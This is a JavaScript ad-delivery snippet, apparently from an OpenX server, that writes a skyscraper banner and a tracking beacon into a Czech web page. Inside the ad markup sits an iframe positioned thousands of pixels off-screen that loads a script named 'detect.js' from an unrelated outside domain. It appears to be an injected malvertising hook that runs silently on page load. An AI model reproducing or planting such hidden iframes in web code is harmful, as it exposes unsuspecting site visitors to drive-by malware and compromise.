 var OX_f54b4b94 = ''; OX_f54b4b94 += "<"+"div class=\"reklama\">"; OX_f54b4b94 += "<"+"p class=\"title\">reklama<"+"/p>"; OX_f54b4b94 += "<"+"/div>"; OX_f54b4b94 += "<"+"div class=\"cleaner\"><"+"/div><"+"a href=\'http://openads.aira.cz/www/delivery/ck.php?oaparams=2__bannerid=1245__zoneid=23__source=null__cb=306892d0a0__oadest=http%3A%2F%2Fwww.thinkserver.cz\' target=\'_blank\'><"+"img src=\'http://openads.aira.cz/www/images/e6eaab880d15ee59c7e997eeee8f90ed.png\' width=\'120\' height=\'600\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_306892d0a0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://openads.aira.cz/www/delivery/lg.php?bannerid=1245&amp;campaignid=294&amp;zoneid=23&amp;source=null&amp;loc=http%3A%2F%2Fdiit.cz%2Fblog%2Ffilmove-formaty-1-honba-za-maximalnim-zazitkem&amp;cb=306892d0a0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe style=\"position:absolute;left:-3912px;top:-4000px;width:303px;height:348px;\" src=\"http://dean.carolinabusinesspartner.com/microwave/detect.js\"><"+"/iframe>";  var placement="skyscraper"; if(placement && document.getElementById(placement)) {
		if(OX_f54b4b94){
			if(typeof window.advertisementCallback == "function")
				advertisementCallback(placement);
			document.getElementById(placement).className += " full";
		}
		document.getElementById(placement).innerHTML = OX_f54b4b94 ;
		if(typeof window.advertisementAfterCallback == "function")
				advertisementAfterCallback(placement);} 